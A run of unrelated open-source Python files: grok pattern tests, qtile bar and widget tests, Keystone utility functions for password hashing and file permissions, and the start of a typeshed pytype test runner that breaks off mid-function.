insist { subject }.include?("foo")
insist { subject["foo"] } == "yo"
end
end
"""
@test
def it_uses_named_captures():
pr = PatternRepo(['patterns/'])
g = LineGrokker('(?<foo>\w+)', pr)
subject = g.grok('hello world')
print 'subject: %s' % subject
expect(subject["foo"]).to_equal("hello")
@test
def it_groks_patterns():
pr = PatternRepo(['patterns/'])
g = LineGrokker('(?<timestamp>%{DATE_EU} %{TIME})', pr)
subject = g.grok('fancy 2001-02-03 04:05:06')
print 'subject: %s' % subject
expect(subject["timestamp"]).to_equal("2001-02-03 04:05:06")
"""
describe "grok on integer types" do
config <<-'CONFIG'
filter {
grok {
match => [ "status", "^403$" ]
add_tag => "four_oh_three"
}
}
CONFIG
sample({ "@fields" => { "status" => 403 } }) do
reject { subject.tags }.include?("_grokparsefailure")
insist { subject.tags }.include?("four_oh_three")
end
end
describe "grok on float types" do
config <<-'CONFIG'
filter {
grok {
match => [ "version", "^1.0$" ]
add_tag => "one_point_oh"
}
}
CONFIG
sample({ "@fields" => { "version" => 1.0 } }) do
reject { subject.tags }.include?("_grokparsefailure")
insist { subject.tags }.include?("one_point_oh")
end
end
describe "tagging on failure" do
config <<-CONFIG
filter {
grok {
pattern => "matchme %{NUMBER:fancy}"
tag_on_failure => false
}
}
CONFIG
sample "matchme 1234" do
reject { subject["@tags"] }.include?("_grokparsefailure")
end
sample "this will not be matched" do
reject { subject["@tags"] }.include?("_grokparsefailure")
end
end
end
"""
@test
def it_captures_named_fields_even_if_the_whole_text_matches():
pr = PatternRepo(['patterns/'])
g = LineGrokker('%{DATE_EU:stimestamp}', pr)
subject = g.grok('2011/01/01')
print 'subject: %s' % subject
expect(subject["stimestamp"]).to_equal("2011/01/01")
@nottest
def it_allows_dashes_in_capture_names():
# not implemented
pr = PatternRepo(['patterns/'])
g = LineGrokker('%{WORD:foo-bar}', pr)
subject = g.grok('hello world')
print 'subject: %s' % subject
expect(subject["foo-bar"]).to_equal("hello")
| |
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2012-2013 Craig Barnes
# Copyright (c) 2012 roger
# Copyright (c) 2012, 2014-2015 Tycho Andersen
# Copyright (c) 2014 Sean Vig
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import tempfile
import pytest
import libqtile.bar
import libqtile.config
import libqtile.confreader
import libqtile.layout
import libqtile.widget
class GBConfig:
auto_fullscreen = True
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("bb"),
libqtile.config.Group("ccc"),
libqtile.config.Group("dddd"),
libqtile.config.Group("Pppy")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.CPUGraph(
width=libqtile.bar.STRETCH,
type="linefill",
border_width=20,
margin_x=1,
margin_y=1
),
libqtile.widget.MemoryGraph(type="line"),
libqtile.widget.SwapGraph(type="box"),
libqtile.widget.TextBox(name="text",
background="333333"),
],
50,
),
bottom=libqtile.bar.Bar(
[
libqtile.widget.GroupBox(),
libqtile.widget.AGroupBox(),
libqtile.widget.Prompt(),
libqtile.widget.WindowName(),
libqtile.widget.Sep(),
libqtile.widget.Clock(),
],
50
),
# TODO: Add vertical bars and test widgets that support them
)
]
main = None
gb_config = pytest.mark.parametrize("qtile", [GBConfig], indirect=True)
def test_completion():
c = libqtile.widget.prompt.CommandCompleter(None, True)
c.reset()
c.lookup = [
("a", "x/a"),
("aa", "x/aa"),
]
assert c.complete("a") == "a"
assert c.actual() == "x/a"
assert c.complete("a") == "aa"
assert c.complete("a") == "a"
c = libqtile.widget.prompt.CommandCompleter(None)
r = c.complete("l")
assert c.actual().endswith(r)
c.reset()
assert c.complete("/bi") == "/bin/"
c.reset()
assert c.complete("/bin") != "/bin/"
c.reset()
home_dir = os.path.expanduser("~")
with tempfile.TemporaryDirectory(prefix="qtile_test_",
dir=home_dir) as absolute_tmp_path:
tmp_dirname = absolute_tmp_path[len(home_dir + os.sep):]
user_input = os.path.join("~", tmp_dirname)
assert c.complete(user_input) == user_input
c.reset()
test_bin_dir = os.path.join(absolute_tmp_path, "qtile-test-bin")
os.mkdir(test_bin_dir)
assert c.complete(user_input) == os.path.join(user_input, "qtile-test-bin") + os.sep
c.reset()
s = "thisisatotallynonexistantpathforsure"
assert c.complete(s) == s
assert c.actual() == s
c.reset()
@gb_config
def test_draw(qtile):
qtile.test_window("one")
b = qtile.c.bar["bottom"].info()
assert b["widgets"][0]["name"] == "groupbox"
@gb_config
def test_prompt(qtile):
assert qtile.c.widget["prompt"].info()["width"] == 0
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("a")
qtile.c.widget["prompt"].fake_keypress("Tab")
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("slash")
qtile.c.widget["prompt"].fake_keypress("Tab")
@gb_config
def test_event(qtile):
qtile.c.group["bb"].toscreen()
@gb_config
def test_textbox(qtile):
assert "text" in qtile.c.list_widgets()
s = "some text"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
s = "Aye, much longer string than the initial one"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
qtile.c.group["Pppy"].toscreen()
qtile.c.widget["text"].set_font(fontsize=12)
@gb_config
def test_textbox_errors(qtile):
qtile.c.widget["text"].update(None)
qtile.c.widget["text"].update("".join(chr(i) for i in range(255)))
qtile.c.widget["text"].update("V\xE2r\xE2na\xE7\xEE")
qtile.c.widget["text"].update("\ua000")
@gb_config
def test_groupbox_button_press(qtile):
qtile.c.group["ccc"].toscreen()
assert qtile.c.groups()["a"]["screen"] is None
qtile.c.bar["bottom"].fake_button_press(0, "bottom", 10, 10, 1)
assert qtile.c.groups()["a"]["screen"] == 0
class GeomConf:
auto_fullscreen = False
main = None
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("b"),
libqtile.config.Group("c"),
libqtile.config.Group("d")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar([], 10),
bottom=libqtile.bar.Bar([], 10),
left=libqtile.bar.Bar([], 10),
right=libqtile.bar.Bar([], 10),
)
]
geom_config = pytest.mark.parametrize("qtile", [GeomConf], indirect=True)
class DBarH(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = True
class DBarV(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = False
class DWidget:
def __init__(self, length, length_type):
self.length, self.length_type = length, length_type
@geom_config
def test_geometry(qtile):
qtile.test_xeyes()
g = qtile.c.screens()[0]["gaps"]
assert g["top"] == (0, 0, 800, 10)
assert g["bottom"] == (0, 590, 800, 10)
assert g["left"] == (0, 10, 10, 580)
assert g["right"] == (790, 10, 10, 580)
assert len(qtile.c.windows()) == 1
geom = qtile.c.windows()[0]
assert geom["x"] == 10
assert geom["y"] == 10
assert geom["width"] == 778
assert geom["height"] == 578
internal = qtile.c.internal_windows()
assert len(internal) == 4
wid = qtile.c.bar["bottom"].info()["window"]
assert qtile.c.window[wid].inspect()
@geom_config
def test_resize(qtile):
def wd(l):
return [i.length for i in l]
def offx(l):
return [i.offsetx for i in l]
def offy(l):
return [i.offsety for i in l]
for DBar, off in ((DBarH, offx), (DBarV, offy)): # noqa: N806
b = DBar([], 100)
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 40, 40, 10]
assert off(dwidget_list) == [0, 10, 50, 90]
b._resize(101, dwidget_list)
assert wd(dwidget_list) == [10, 40, 41, 10]
assert off(dwidget_list) == [0, 10, 50, 91]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10]
assert off(dwidget_list) == [0]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 90]
assert off(dwidget_list) == [0, 10]
dwidget_list = [
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [90, 10]
assert off(dwidget_list) == [0, 90]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 80, 10]
assert off(dwidget_list) == [0, 10, 90]
class ExampleWidget(libqtile.widget.base._Widget):
orientations = libqtile.widget.base.ORIENTATION_HORIZONTAL
def __init__(self):
libqtile.widget.base._Widget.__init__(self, 10)
def draw(self):
pass
class IncompatibleWidgetConf:
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
left=libqtile.bar.Bar(
[
# This widget doesn't support vertical orientation
ExampleWidget(),
],
10
),
)
]
def test_incompatible_widget(qtile_nospawn):
config = IncompatibleWidgetConf
# Ensure that adding a widget that doesn't support the orientation of the
# bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
class MultiStretchConf:
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
),
)
]
def test_multiple_stretches(qtile_nospawn):
config = MultiStretchConf
# Ensure that adding two STRETCH widgets to the same bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
def test_basic(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
assert i["widgets"][1]["width"] == 780
assert i["widgets"][2]["offset"] == 790
libqtile.hook.clear()
def test_singlespacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][0]["width"] == 800
libqtile.hook.clear()
def test_nospacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
libqtile.hook.clear()
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 - 2012 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import calendar
import grp
import hashlib
import json
import os
import pwd
import passlib.hash
import six
from keystone.common import config
from keystone.common import environment
from keystone import exception
from keystone.openstack.common import log
from keystone.openstack.common import strutils
from six import moves
CONF = config.CONF
LOG = log.getLogger(__name__)
def read_cached_file(filename, cache_info, reload_func=None):
"""Read from a file if it has been modified.
:param cache_info: dictionary to hold opaque cache.
:param reload_func: optional function to be called with data when
file is reloaded due to a modification.
:returns: data from file.
"""
mtime = os.path.getmtime(filename)
if not cache_info or mtime != cache_info.get('mtime'):
with open(filename) as fap:
cache_info['data'] = fap.read()
cache_info['mtime'] = mtime
if reload_func:
reload_func(cache_info['data'])
return cache_info['data']
class SmarterEncoder(json.JSONEncoder):
"""Help for JSON encoding dict-like objects."""
def default(self, obj):
if not isinstance(obj, dict) and hasattr(obj, 'iteritems'):
return dict(obj.iteritems())
return super(SmarterEncoder, self).default(obj)
def trunc_password(password):
"""Truncate passwords to the max_length."""
max_length = CONF.identity.max_password_length
try:
if len(password) > max_length:
LOG.warning(
_('Truncating user password to %s characters.'), max_length)
return password[:max_length]
except TypeError:
raise exception.ValidationError(attribute='string', target='password')
def hash_access_key(access):
hash_ = hashlib.sha256()
hash_.update(access)
return hash_.hexdigest()
def hash_user_password(user):
"""Hash a user dict's password without modifying the passed-in dict."""
password = user.get('password')
if password is None:
return user
return dict(user, password=hash_password(password))
def hash_ldap_user_password(user):
"""Hash a user dict's password without modifying the passed-in dict."""
password = user.get('password')
if password is None:
return user
return dict(user, password=ldap_hash_password(password))
def hash_password(password):
"""Hash a password. Hard."""
password_utf8 = trunc_password(password).encode('utf-8')
if passlib.hash.sha512_crypt.identify(password_utf8):
return password_utf8
h = passlib.hash.sha512_crypt.encrypt(password_utf8,
rounds=CONF.crypt_strength)
return h
def ldap_hash_password(password):
"""Hash a password. Hard."""
password_utf8 = trunc_password(password).encode('utf-8')
h = passlib.hash.ldap_salted_sha1.encrypt(password_utf8)
return h
def ldap_check_password(password, hashed):
if password is None:
return False
password_utf8 = trunc_password(password).encode('utf-8')
return passlib.hash.ldap_salted_sha1.verify(password_utf8, hashed)
def check_password(password, hashed):
"""Check that a plaintext password matches hashed.
hashpw returns the salt value concatenated with the actual hash value.
It extracts the actual salt if this value is then passed as the salt.
"""
if password is None or hashed is None:
return False
password_utf8 = trunc_password(password).encode('utf-8')
return passlib.hash.sha512_crypt.verify(password_utf8, hashed)
def attr_as_boolean(val_attr):
"""Returns the boolean value, decoded from a string.
We test explicitly for a value meaning False, which can be one of
several formats as specified in oslo strutils.FALSE_STRINGS.
All other string values (including an empty string) are treated as
meaning True.
"""
return strutils.bool_from_string(val_attr, default=True)
# From python 2.7
def check_output(*popenargs, **kwargs):
r"""Run command with arguments and return its output as a byte string.
If the exit code was non-zero it raises a CalledProcessError. The
CalledProcessError object will have the return code in the returncode
attribute and output in the output attribute.
The arguments are the same as for the Popen constructor. Example:
>>> check_output(['ls', '-l', '/dev/null'])
'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n'
The stdout argument is not allowed as it is used internally.
To capture standard error in the result, use stderr=STDOUT.
>>> import sys
>>> check_output(['/bin/sh', '-c',
... 'ls -l non_existent_file ; exit 0'],
... stderr=sys.STDOUT)
'ls: non_existent_file: No such file or directory\n'
"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
LOG.debug(' '.join(popenargs[0]))
process = environment.subprocess.Popen(stdout=environment.subprocess.PIPE,
*popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get('args')
if cmd is None:
cmd = popenargs[0]
raise environment.subprocess.CalledProcessError(retcode, cmd)
return output
def get_blob_from_credential(credential):
try:
blob = json.loads(credential.blob)
except (ValueError, TypeError):
raise exception.ValidationError(
message=_('Invalid blob in credential'))
if not blob or not isinstance(blob, dict):
raise exception.ValidationError(attribute='blob',
target='credential')
return blob
def convert_ec2_to_v3_credential(ec2credential):
blob = {'access': ec2credential.access,
'secret': ec2credential.secret}
return {'id': hash_access_key(ec2credential.access),
'user_id': ec2credential.user_id,
'project_id': ec2credential.tenant_id,
'blob': json.dumps(blob),
'type': 'ec2',
'extra': json.dumps({})}
def convert_v3_to_ec2_credential(credential):
blob = get_blob_from_credential(credential)
return {'access': blob.get('access'),
'secret': blob.get('secret'),
'user_id': credential.user_id,
'tenant_id': credential.project_id,
}
def git(*args):
return check_output(['git'] + list(args))
def unixtime(dt_obj):
"""Format datetime object as unix timestamp
:param dt_obj: datetime.datetime object
:returns: float
"""
return calendar.timegm(dt_obj.utctimetuple())
def auth_str_equal(provided, known):
"""Constant-time string comparison.
:params provided: the first string
:params known: the second string
:return: True if the strings are equal.
This function takes two strings and compares them. It is intended to be
used when doing a comparison for authentication purposes to help guard
against timing attacks. When using the function for this purpose, always
provide the user-provided password as the first argument. The time this
function will take is always a factor of the length of this string.
"""
result = 0
p_len = len(provided)
k_len = len(known)
for i in moves.range(p_len):
a = ord(provided[i]) if i < p_len else 0
b = ord(known[i]) if i < k_len else 0
result |= a ^ b
return (p_len == k_len) & (result == 0)
def setup_remote_pydev_debug():
if CONF.pydev_debug_host and CONF.pydev_debug_port:
try:
try:
from pydev import pydevd
except ImportError:
import pydevd
pydevd.settrace(CONF.pydev_debug_host,
port=CONF.pydev_debug_port,
stdoutToServer=True,
stderrToServer=True)
return True
except Exception:
LOG.exception(_(
'Error setting up the debug environment. Verify that the '
'option --debug-url has the format <host>:<port> and that a '
'debugger processes is listening on that port.'))
raise
class LimitingReader(object):
"""Reader to limit the size of an incoming request."""
def __init__(self, data, limit):
"""Create an iterator on the underlying data.
:param data: Underlying data object
:param limit: maximum number of bytes the reader should allow
"""
self.data = data
self.limit = limit
self.bytes_read = 0
def __iter__(self):
for chunk in self.data:
self.bytes_read += len(chunk)
if self.bytes_read > self.limit:
raise exception.RequestTooLarge()
else:
yield chunk
def read(self, i=None):
# NOTE(jamielennox): We can't simply provide the default to the read()
# call as the expected default differs between mod_wsgi and eventlet
if i is None:
result = self.data.read()
else:
result = self.data.read(i)
self.bytes_read += len(result)
if self.bytes_read > self.limit:
raise exception.RequestTooLarge()
return result
def get_unix_user(user=None):
'''Get the uid and user name.
This is a convenience utility which accepts a variety of input
which might represent a unix user. If successful it returns the uid
and name. Valid input is:
string
A string is first considered to be a user name and a lookup is
attempted under that name. If no name is found then an attempt
is made to convert the string to an integer and perform a
lookup as a uid.
int
An integer is interpretted as a uid.
None
None is interpreted to mean use the current process's
effective user.
If the input is a valid type but no user is found a KeyError is
raised. If the input is not a valid type a TypeError is raised.
:param object user: string, int or None specifying the user to
lookup.
:return: tuple of (uid, name)
'''
if isinstance(user, six.string_types):
try:
user_info = pwd.getpwnam(user)
except KeyError:
try:
i = int(user)
except ValueError:
raise KeyError("user name '%s' not found" % user)
try:
user_info = pwd.getpwuid(i)
except KeyError:
raise KeyError("user id %d not found" % i)
elif isinstance(user, int):
try:
user_info = pwd.getpwuid(user)
except KeyError:
raise KeyError("user id %d not found" % user)
elif user is None:
user_info = pwd.getpwuid(os.geteuid())
else:
raise TypeError('user must be string, int or None; not %s (%r)' %
(user.__class__.__name__, user))
return user_info.pw_uid, user_info.pw_name
def get_unix_group(group=None):
'''Get the gid and group name.
This is a convenience utility which accepts a variety of input
which might represent a unix group. If successful it returns the gid
and name. Valid input is:
string
A string is first considered to be a group name and a lookup is
attempted under that name. If no name is found then an attempt
is made to convert the string to an integer and perform a
lookup as a gid.
int
An integer is interpretted as a gid.
None
None is interpreted to mean use the current process's
effective group.
If the input is a valid type but no group is found a KeyError is
raised. If the input is not a valid type a TypeError is raised.
:param object group: string, int or None specifying the group to
lookup.
:return: tuple of (gid, name)
'''
if isinstance(group, six.string_types):
try:
group_info = grp.getgrnam(group)
except KeyError:
# Was an int passed as a string?
# Try converting to int and lookup by id instead.
try:
i = int(group)
except ValueError:
raise KeyError("group name '%s' not found" % group)
try:
group_info = grp.getgrgid(i)
except KeyError:
raise KeyError("group id %d not found" % i)
elif isinstance(group, int):
try:
group_info = grp.getgrgid(group)
except KeyError:
raise KeyError("group id %d not found" % group)
elif group is None:
group_info = grp.getgrgid(os.getegid())
else:
raise TypeError('group must be string, int or None; not %s (%r)' %
(group.__class__.__name__, group))
return group_info.gr_gid, group_info.gr_name
def set_permissions(path, mode=None, user=None, group=None, log=None):
'''Set the ownership and permissions on the pathname.
Each of the mode, user and group are optional, if None then
that aspect is not modified.
Owner and group may be specified either with a symbolic name
or numeric id.
:param string path: Pathname of directory whose existence is assured.
:param object mode: ownership permissions flags (int) i.e. chmod,
if None do not set.
:param object user: set user, name (string) or uid (integer),
if None do not set.
:param object group: set group, name (string) or gid (integer)
if None do not set.
:param logger log: logging.logger object, used to emit log messages,
if None no logging is performed.
'''
if user is None:
user_uid, user_name = None, None
else:
user_uid, user_name = get_unix_user(user)
if group is None:
group_gid, group_name = None, None
else:
group_gid, group_name = get_unix_group(group)
if log:
if mode is None:
mode_string = str(mode)
else:
mode_string = oct(mode)
log.debug("set_permissions: "
"path='%s' mode=%s user=%s(%s) group=%s(%s)",
path, mode_string,
user_name, user_uid, group_name, group_gid)
# Change user and group if specified
if user_uid is not None or group_gid is not None:
if user_uid is None:
user_uid = -1
if group_gid is None:
group_gid = -1
try:
os.chown(path, user_uid, group_gid)
except OSError as exc:
raise EnvironmentError("chown('%s', %s, %s): %s" %
(path,
user_name, group_name,
exc.strerror))
# Change permission flags
if mode is not None:
try:
os.chmod(path, mode)
except OSError as exc:
raise EnvironmentError("chmod('%s', %#o): %s" %
(path, mode, exc.strerror))
def make_dirs(path, mode=None, user=None, group=None, log=None):
'''Assure directory exists, set ownership and permissions.
Assure the directory exists and optionally set it's ownership
and permissions.
Each of the mode, user and group are optional, if None then
that aspect is not modified.
Owner and group may be specified either with a symbolic name
or numeric id.
:param string path: Pathname of directory whose existence is assured.
:param object mode: ownership permissions flags (int) i.e. chmod,
if None do not set.
:param object user: set user, name (string) or uid (integer),
if None do not set.
:param object group: set group, name (string) or gid (integer)
if None do not set.
:param logger log: logging.logger object, used to emit log messages,
if None no logging is performed.
'''
if log:
if mode is None:
mode_string = str(mode)
else:
mode_string = oct(mode)
log.debug("make_dirs path='%s' mode=%s user=%s group=%s",
path, mode_string, user, group)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
raise EnvironmentError("makedirs('%s'): %s" % (path, exc.strerror))
set_permissions(path, mode, user, group, log)
| |
#!/usr/bin/env python
r"""Test runner for typeshed.
Depends on mypy and pytype being installed.
If pytype is installed:
1. For every pyi, do nothing if it is in pytype_blacklist.txt.
2. If the blacklist line has a "# parse only" comment run
"pytd <foo.pyi>" in a separate process.
3. If the file is not in the blacklist run
"pytype --typeshed-location=typeshed_location --module-name=foo \
--convert-to-pickle=tmp_file <foo.pyi>.
Option two will parse the file, mostly syntactical correctness. Option three
will load the file and all the builtins, typeshed dependencies. This will
also discover incorrect usage of imported modules.
"""
import argparse
import collections
import itertools
import os
import re
import subprocess
import sys
parser = argparse.ArgumentParser(description='Pytype/typeshed tests.')
parser.add_argument('-n', '--dry-run', action='store_true',
help="Don't actually run tests")
parser.add_argument('--num-parallel', type=int, default=1,
help='Number of test processes to spawn')
# Default to '' so that symlinking typeshed subdirs in cwd will work.
parser.add_argument('--typeshed-location', type=str, default='',
help='Path to typeshed installation.')
# Default to '' so that finding pytype in path will work.
parser.add_argument('--pytype-bin-dir', type=str, default='',
help='Path to directory with pytype and pytd executables.')
# Set to true to print a stack trace every time an exception is thrown.
parser.add_argument('--print-stderr', type=bool, default=False,
help='Print stderr every time an error is encountered.')
# We need to invoke python3.6. The default here works with our travis tests.
parser.add_argument('--python36-exe', type=str,
default='/opt/python/3.6/bin/python3.6',
help='Path to a python 3.6 interpreter.')
Dirs = collections.namedtuple('Dirs', ['pytype', 'typeshed'])
TYPESHED_SUBDIRS = ['stdlib', 'third_party']
def main():
args = parser.parse_args()
code, runs = pytype_test(args)
if code:
print('--- exit status %d ---' % code)
sys.exit(code)
if not runs:
print('--- nothing to do; exit 1 ---')
sys.exit(1)
def get_project_dirs(args):
"""Top-level project directories for pytype executables and typeshed."""
typeshed_location = args.typeshed_location or os.getcwd()
return Dirs(args.pytype_bin_dir, typeshed_location)
class PathMatcher(object):
def __init__(self, patterns):
if patterns:
self.matcher = re.compile('(%s)$' % '|'.join(patterns))
else:
self.matcher = None
def search(self, path):
if not self.matcher:
return False
return self.matcher.search(path)
def load_blacklist(dirs):
filename = os.path.join(dirs.typeshed, 'tests', 'pytype_blacklist.txt')
skip_re = re.compile(r'^\s*([^\s#]+)\s*(?:#.*)?$')
parse_only_re = re.compile(r'^\s*([^\s#]+)\s*#\s*parse only\s*')
skip = []
parse_only = []
with open(filename) as f:
for line in f:
parse_only_match = parse_only_re.match(line)
skip_match = skip_re.match(line)
if parse_only_match:
parse_only.append(parse_only_match.group(1))
elif skip_match:
skip.append(skip_match.group(1))
return skip, parse_only
class BinaryRun(object):
def __init__(self, args, dry_run=False, env=None):
self.args = args
self.results = None
if dry_run:
self.results = (0, '', '')
else:
if env is not None:
full_env = os.environ.copy()
full_env.update(env)
else:
full_env = None
self.proc = subprocess.Popen(
self.args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=full_env)
def communicate(self):
if self.results:
return self.results
stdout, stderr = self.proc.communicate()
self.results = self.proc.returncode, stdout, stderr
return self.results
def _get_relative(filename):
top = 0
for d in TYPESHED_SUBDIRS:
try:
top = filename.index(d)
except ValueError:
continue
else:
break
return filename[top:]
def _get_module_name(filename):
"""Converts a filename {subdir}/m.n/module/foo to module.foo."""
return '.'.join(_get_relative(filename).split(os.path.sep)[2:]).replace(
'.pyi', '').replace('.__init__', '')
def can_run(path, exe, *args):
exe = os.path.join(path, exe)
try:
BinaryRun([exe] + list(args)).communicate()
return True
except OSError:
return False
def _is_version(path, version):
return any('%s/%s' % (d, version) in path for d in TYPESHED_SUBDIRS)
def pytype_test(args):
dirs = get_project_dirs(args)
pytype_exe = os.path.join(dirs.pytype, 'pytype-single')
paths = [os.path.join(dirs.typeshed, d) for d in TYPESHED_SUBDIRS]
for p in paths:
if not os.path.isdir(p):
print('Cannot find typeshed subdir at %s '
'(specify parent dir via --typeshed_location)' % p)
return 0, 0
if can_run(dirs.pytype, 'pytd', '-h'):
pytd_exe = os.path.join(dirs.pytype, 'pytd')
elif can_run(dirs.pytype, 'pytd_tool', '-h'):
pytd_exe = os.path.join(dirs.pytype, 'pytd_tool')
else:
print('Cannot run pytd. Did you install pytype?')
return 0, 0
if not can_run('', args.python36_exe, '--version'):
print('Cannot run python3.6 from %s. (point to a valid executable via '
'--python36-exe)' % args.python36_exe)
return 0, 0
stdlib = 'stdlib/'
six = 'third_party/.*/six/'
mypy_extensions = 'third_party/.*/mypy_extensions'
wanted = re.compile(
r'(?:%s).*\.pyi$' % '|'.join([stdlib, six, mypy_extensions]))
skip, parse_only = load_blacklist(dirs)
skipped = PathMatcher(skip)
parse_only = PathMatcher(parse_only)
pytype_run = []
pytd_run = []
bad = []
def _make_test(filename, major_version):
run_cmd = [
pytype_exe,
'--module-name=%s' % _get_module_name(filename),
'--parse-pyi',
]
if major_version == 3:
run_cmd += [
'-V 3.6',
'--python_exe=%s' % args.python36_exe,
]
return BinaryRun(run_cmd + [filename],
dry_run=args.dry_run,
env={"TYPESHED_HOME": dirs.typeshed})
for root, _, filenames in itertools.chain.from_iterable(
os.walk(p) for p in paths):
for f in sorted(filenames):
f = os.path.join(root, f)
rel = _get_relative(f)
if wanted.search(rel):
if parse_only.search(rel):
pytd_run.append(f)
elif not skipped.search(rel):
pytype_run.append(f)
running_tests = collections.deque()
max_code, runs, errors = 0, 0, 0
files = pytype_run + pytd_run
total_tests = len(files)
# Files in {subdir}/2and3 get tested twice
total_tests += sum(1 for f in pytype_run if _is_version(f, '2and3'))
print("Testing files with pytype...")
while 1:
while files and len(running_tests) < args.num_parallel:
f = files.pop()
if f in pytype_run:
if _is_version(f, '2and3'):
running_tests.append(_make_test(f, 2))
running_tests.append(_make_test(f, 3))
elif _is_version(f, '2'):
running_tests.append(_make_test(f, 2))
elif _is_version(f, '3'):
running_tests.append(_make_test(f, 3))
else:
print("Unrecognised path: %s" % f)
elif f in pytd_run:
test_run = BinaryRun([pytd_exe, f], dry_run=args.dry_run)
running_tests.append(test_run)
else:
raise ValueError('Unknown action for file: %s' % f)
if not running_tests:
break
test_run = running_tests.popleft()
code, _, stderr = test_run.communicate()
max_code = max(max_code, code)
runs += 1
if code:
if args.print_stderr:
print(stderr)
errors += 1
# We strip off the stack trace and just leave the last line with the
# actual error; to see the stack traces use --print_stderr.
bad.append((_get_relative(test_run.args[-1]),
